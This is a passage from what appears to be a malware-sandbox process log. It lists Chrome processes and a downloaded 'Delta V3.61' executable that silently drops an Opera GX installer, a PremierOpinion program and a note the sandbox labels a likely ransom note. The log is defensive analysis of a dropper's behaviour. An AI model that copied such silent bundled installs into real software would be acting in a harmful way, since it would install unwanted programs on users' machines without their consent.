  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --field-trial-handle=6464,i,17974717108044324613,4368586998847355994,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5736 /prefetch:1
  2⤵
  PID:3888
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --field-trial-handle=6380,i,17974717108044324613,4368586998847355994,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6436 /prefetch:1
  2⤵
  PID:2916
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=5700,i,17974717108044324613,4368586998847355994,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4668 /prefetch:8
  2⤵
  PID:5128
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=6408,i,17974717108044324613,4368586998847355994,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6748 /prefetch:8
  2⤵
  PID:5764
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=6376,i,17974717108044324613,4368586998847355994,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5312 /prefetch:8
  2⤵
  PID:4344
- C:\Users\Admin\Downloads\winrar-x64-701.exe
  "C:\Users\Admin\Downloads\winrar-x64-701.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:2356
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1188,i,17974717108044324613,4368586998847355994,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6344 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3028
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --field-trial-handle=5940,i,17974717108044324613,4368586998847355994,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5196 /prefetch:1
  2⤵
  PID:2700
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=240,i,17974717108044324613,4368586998847355994,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6972 /prefetch:8
  2⤵
  PID:5600
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=6956,i,17974717108044324613,4368586998847355994,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6132 /prefetch:8
  2⤵
  PID:4552
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --field-trial-handle=6476,i,17974717108044324613,4368586998847355994,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6704 /prefetch:1
  2⤵
  PID:4460
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=46 --field-trial-handle=4812,i,17974717108044324613,4368586998847355994,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6796 /prefetch:1
  2⤵
  PID:3120
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --field-trial-handle=6644,i,17974717108044324613,4368586998847355994,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6840 /prefetch:1
  2⤵
  PID:5192
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=48 --field-trial-handle=4668,i,17974717108044324613,4368586998847355994,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6456 /prefetch:1
  2⤵
  PID:3964
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=49 --field-trial-handle=6484,i,17974717108044324613,4368586998847355994,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3372 /prefetch:1
  2⤵
  PID:4408
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=50 --field-trial-handle=6876,i,17974717108044324613,4368586998847355994,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5808 /prefetch:1
  2⤵
  PID:5440
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=51 --field-trial-handle=6548,i,17974717108044324613,4368586998847355994,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6448 /prefetch:1
  2⤵
  PID:5992
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=52 --field-trial-handle=7092,i,17974717108044324613,4368586998847355994,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6996 /prefetch:1
  2⤵
  PID:3428
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=53 --field-trial-handle=7124,i,17974717108044324613,4368586998847355994,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4588 /prefetch:1
  2⤵
  PID:5896
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=54 --field-trial-handle=6064,i,17974717108044324613,4368586998847355994,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6480 /prefetch:1
  2⤵
  PID:5068
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=55 --field-trial-handle=6792,i,17974717108044324613,4368586998847355994,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5676 /prefetch:1
  2⤵
  PID:5944
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=56 --field-trial-handle=6748,i,17974717108044324613,4368586998847355994,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6512 /prefetch:1
  2⤵
  PID:3812
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=57 --field-trial-handle=6916,i,17974717108044324613,4368586998847355994,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6568 /prefetch:1
  2⤵
  PID:1240
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=58 --field-trial-handle=6124,i,17974717108044324613,4368586998847355994,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6884 /prefetch:1
  2⤵
  PID:1676
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=59 --field-trial-handle=7032,i,17974717108044324613,4368586998847355994,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=7284 /prefetch:1
  2⤵
  PID:5588
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=60 --field-trial-handle=7064,i,17974717108044324613,4368586998847355994,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=7468 /prefetch:1
  2⤵
  PID:5680
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=61 --field-trial-handle=7636,i,17974717108044324613,4368586998847355994,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=7628 /prefetch:1
  2⤵
  PID:5992
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=62 --field-trial-handle=7472,i,17974717108044324613,4368586998847355994,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=7452 /prefetch:1
  2⤵
  PID:1456
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=63 --field-trial-handle=7680,i,17974717108044324613,4368586998847355994,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=7684 /prefetch:1
  2⤵
  PID:5284
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=64 --field-trial-handle=7612,i,17974717108044324613,4368586998847355994,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=7652 /prefetch:1
  2⤵
  PID:4268
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=65 --field-trial-handle=8080,i,17974717108044324613,4368586998847355994,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=8116 /prefetch:1
  2⤵
  PID:3500
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=66 --field-trial-handle=7540,i,17974717108044324613,4368586998847355994,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=7272 /prefetch:1
  2⤵
  PID:6072
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=67 --field-trial-handle=7076,i,17974717108044324613,4368586998847355994,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=7412 /prefetch:1
  2⤵
  PID:2016
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=68 --field-trial-handle=7536,i,17974717108044324613,4368586998847355994,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=8012 /prefetch:1
  2⤵
  PID:4112
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=6068,i,17974717108044324613,4368586998847355994,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=7916 /prefetch:8
  2⤵
  PID:4592
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=7940,i,17974717108044324613,4368586998847355994,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=7784 /prefetch:8
  2⤵
  PID:1900
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=7344,i,17974717108044324613,4368586998847355994,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=7824 /prefetch:8
  2⤵
  PID:5896
- C:\Users\Admin\Downloads\Delta V3.61 b_95073919.exe
  "C:\Users\Admin\Downloads\Delta V3.61 b_95073919.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  PID:4344
- - C:\Users\Admin\AppData\Local\OperaGX.exe
    C:\Users\Admin\AppData\Local\OperaGX.exe --silent --allusers=0
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:1084
  - - C:\Users\Admin\AppData\Local\Temp\7zSC34E2903\setup.exe
      C:\Users\Admin\AppData\Local\Temp\7zSC34E2903\setup.exe --silent --allusers=0 --server-tracking-blob=NTgzNTVhOTE2YTAxYjI5ZDNlYzFhOWM2MDY3YjVkZDk5MDhlMmJlNTQ0ZDBkYjJhMmZjNzNjNWQxMjBhYTE1Yzp7ImNvdW50cnkiOiJHQiIsImVkaXRpb24iOiJzdGQtMiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFHWFNldHVwLmV4ZSIsInByb2R1Y3QiOiJvcGVyYV9neCIsInF1ZXJ5IjoiL29wZXJhX2d4L3N0YWJsZS9lZGl0aW9uL3N0ZC0yP3V0bV9zb3VyY2U9UFdOZ2FtZXMmdXRtX21lZGl1bT1wYSZ1dG1fY2FtcGFpZ249UFdOX0dCX1BCNV85NDE2XzM1NzUmdXRtX2lkPWJhMWE5YWI1NTc0ODQwYzQ5MWI2MTZhNDI1MTIwMTgzIiwidGltZXN0YW1wIjoiMTczNjk1MDc2NS44NDQ2IiwidXNlcmFnZW50IjoiTW96aWxsYS80LjAgKGNvbXBhdGlibGU7IE1TSUUgNy4wOyBXaW5kb3dzIE5UIDYuMjsgV09XNjQ7IFRyaWRlbnQvNy4wOyAuTkVUNC4wQzsgLk5FVDQuMEU7IC5ORVQgQ0xSIDIuMC41MDcyNzsgLk5FVCBDTFIgMy4wLjMwNzI5OyAuTkVUIENMUiAzLjUuMzA3MjkpIiwidXRtIjp7ImNhbXBhaWduIjoiUFdOX0dCX1BCNV85NDE2XzM1NzUiLCJpZCI6ImJhMWE5YWI1NTc0ODQwYzQ5MWI2MTZhNDI1MTIwMTgzIiwibWVkaXVtIjoicGEiLCJzb3VyY2UiOiJQV05nYW1lcyJ9LCJ1dWlkIjoiYTQ2YzEyZmMtYTRmYS00MWE5LThjYzYtZGExZGExYmNkOWFhIn0=
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Enumerates connected drives
      System Location Discovery: System Language Discovery
      Modifies system certificate store
      PID:3888
    - - C:\Users\Admin\AppData\Local\Temp\7zSC34E2903\setup.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zSC34E2903\setup.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera GX Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera GX Stable\crash_count.txt" --url=https://crashstats-collector-2.opera.com/ --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktopGX --annotation=ver=115.0.5322.142 --initial-client-data=0x330,0x334,0x338,0x310,0x33c,0x70b5ed4c,0x70b5ed58,0x70b5ed64
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        
        PID:5100
    - - C:\Users\Admin\AppData\Local\Temp\.opera\Opera GX Installer Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\.opera\Opera GX Installer Temp\setup.exe" --version
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        
        PID:5512
    - - C:\Users\Admin\AppData\Local\Temp\7zSC34E2903\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zSC34E2903\setup.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --vought_browser=0 --launchopera=1 --showunbox=0 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera GX" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --server-tracking-data=server_tracking_data --initial-pid=3888 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera GX Installer Temp\opera_package_20250115141928" --session-guid=4e39288f-5d45-49a9-99ef-3fe095d2c81c --server-tracking-blob=NzA5OGM3MWZhOWYyZGJmMDc0N2FhZDYzODgyNGRjM2ZmZDg3NzRjOWY1ZDkyNzE1MDU0NTIyZDg0ZDNjNzY5ODp7ImNvdW50cnkiOiJHQiIsImVkaXRpb24iOiJzdGQtMiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFHWFNldHVwLmV4ZSIsInByb2R1Y3QiOnsibmFtZSI6Im9wZXJhX2d4In0sInF1ZXJ5IjoiL29wZXJhX2d4L3N0YWJsZS9lZGl0aW9uL3N0ZC0yP3V0bV9zb3VyY2U9UFdOZ2FtZXMmdXRtX21lZGl1bT1wYSZ1dG1fY2FtcGFpZ249UFdOX0dCX1BCNV85NDE2XzM1NzUmdXRtX2lkPWJhMWE5YWI1NTc0ODQwYzQ5MWI2MTZhNDI1MTIwMTgzIiwic3lzdGVtIjp7InBsYXRmb3JtIjp7ImFyY2giOiJ4ODZfNjQiLCJvcHN5cyI6IldpbmRvd3MiLCJvcHN5cy12ZXJzaW9uIjoiMTAiLCJwYWNrYWdlIjoiRVhFIn19LCJ0aW1lc3RhbXAiOiIxNzM2OTUwNzY1Ljg0NDYiLCJ1c2VyYWdlbnQiOiJNb3ppbGxhLzQuMCAoY29tcGF0aWJsZTsgTVNJRSA3LjA7IFdpbmRvd3MgTlQgNi4yOyBXT1c2NDsgVHJpZGVudC83LjA7IC5ORVQ0LjBDOyAuTkVUNC4wRTsgLk5FVCBDTFIgMi4wLjUwNzI3OyAuTkVUIENMUiAzLjAuMzA3Mjk7IC5ORVQgQ0xSIDMuNS4zMDcyOSkiLCJ1dG0iOnsiY2FtcGFpZ24iOiJQV05fR0JfUEI1Xzk0MTZfMzU3NSIsImlkIjoiYmExYTlhYjU1NzQ4NDBjNDkxYjYxNmE0MjUxMjAxODMiLCJtZWRpdW0iOiJwYSIsInNvdXJjZSI6IlBXTmdhbWVzIn0sInV1aWQiOiJhNDZjMTJmYy1hNGZhLTQxYTktOGNjNi1kYTFkYTFiY2Q5YWEifQ== --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=1806000000000000
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Enumerates connected drives
        System Location Discovery: System Language Discovery
        
        PID:3264
      - C:\Users\Admin\AppData\Local\Temp\7zSC34E2903\setup.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zSC34E2903\setup.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera GX Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera GX Stable\crash_count.txt" --url=https://crashstats-collector-2.opera.com/ --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktopGX --annotation=ver=115.0.5322.142 --initial-client-data=0x320,0x324,0x328,0x2fc,0x32c,0x6fd9ed4c,0x6fd9ed58,0x6fd9ed64
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        
        PID:5128
    - - C:\Users\Admin\AppData\Local\Temp\.opera\Opera GX Installer Temp\opera_package_202501151419281\assistant\Opera_GX_assistant_73.0.3856.382_Setup.exe_sfx.exe
        
        "C:\Users\Admin\AppData\Local\Temp\.opera\Opera GX Installer Temp\opera_package_202501151419281\assistant\Opera_GX_assistant_73.0.3856.382_Setup.exe_sfx.exe"
        5⤵
        Executes dropped EXE
        
        PID:2060
    - - C:\Users\Admin\AppData\Local\Temp\.opera\Opera GX Installer Temp\opera_package_202501151419281\assistant\assistant_installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\.opera\Opera GX Installer Temp\opera_package_202501151419281\assistant\assistant_installer.exe" --version
        5⤵
        Executes dropped EXE
        
        PID:6116
      - C:\Users\Admin\AppData\Local\Temp\.opera\Opera GX Installer Temp\opera_package_202501151419281\assistant\assistant_installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\.opera\Opera GX Installer Temp\opera_package_202501151419281\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera GX Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera GX Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktopGX --annotation=ver=73.0.3856.382 --initial-client-data=0x288,0x28c,0x290,0x264,0x294,0xf04f48,0xf04f58,0xf04f64
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:2636
- - C:\Users\Admin\AppData\Local\Temp\PremierOpinion\ContentI3.exe
    "C:\Users\Admin\AppData\Local\Temp\PremierOpinion\ContentI3.exe" -c:1538 -t:InstallUnion
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:2184
- - C:\Windows\SysWOW64\NOTEPAD.EXE
    "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\link.txt
    3⤵
    - System Location Discovery: System Language Discovery
    - Opens file in notepad (likely ransom note)
    PID:5044
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=72 --field-trial-handle=7768,i,17974717108044324613,4368586998847355994,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=7080 /prefetch:1
  2⤵
  PID:1168
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=73 --field-trial-handle=7964,i,17974717108044324613,4368586998847355994,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=7452 /prefetch:1
  2⤵
  PID:2928
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=74 --field-trial-handle=8028,i,17974717108044324613,4368586998847355994,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=8008 /prefetch:1
  2⤵
  PID:4980
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=7776,i,17974717108044324613,4368586998847355994,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=7368 /prefetch:8
  2⤵
  PID:4844
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=76 --field-trial-handle=7116,i,17974717108044324613,4368586998847355994,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=7568 /prefetch:1
  2⤵
  PID:5436
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=77 --field-trial-handle=6180,i,17974717108044324613,4368586998847355994,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=7604 /prefetch:1
  2⤵
  PID:2920
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=78 --field-trial-handle=7072,i,17974717108044324613,4368586998847355994,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=7304 /prefetch:1
  2⤵
  PID:3992
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=79 --field-trial-handle=4652,i,17974717108044324613,4368586998847355994,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3224 /prefetch:1
  2⤵
  PID:4912
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=80 --field-trial-handle=7424,i,17974717108044324613,4368586998847355994,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=7464 /prefetch:1
  2⤵
  PID:1032
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=81 --field-trial-handle=6092,i,17974717108044324613,4368586998847355994,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6736 /prefetch:1
  2⤵
  PID:712
- C:\Program Files\Google\Chrome\Application\chrome.exe
